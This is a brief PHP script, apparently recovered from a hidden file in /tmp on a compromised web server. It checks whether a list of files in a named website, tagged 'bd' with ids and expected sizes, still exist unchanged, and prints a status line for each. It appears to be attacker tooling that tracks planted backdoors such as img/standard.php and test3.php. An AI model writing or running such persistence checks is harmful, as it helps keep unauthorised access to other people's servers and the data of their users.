File: //tmp/.pointer
<?php $r = '/home/vitanhod/vigolic-100.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1268894@@31",
"/orderemail.php"=>"bd@@1269172@@99",
"/includes/configOnline.php"=>"bd@@1269042@@63",
"/includes/config.php"=>"bd@@1269354@@69",
"/test3.php"=>"bd@@1276548@@51",
"/includes/tinymce.php"=>"bd@@1269452@@806",
"/img/standard.php"=>"bd@@1276415@@12",
"/img/standard.php"=>"bd@@1268515@@894",
"/img/userGroups.php"=>"bd@@1309806@@839",
"/includes/tinymce.php"=>"bd@@1276303@@26",
"/test3.php"=>"bd@@1269492@@986"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');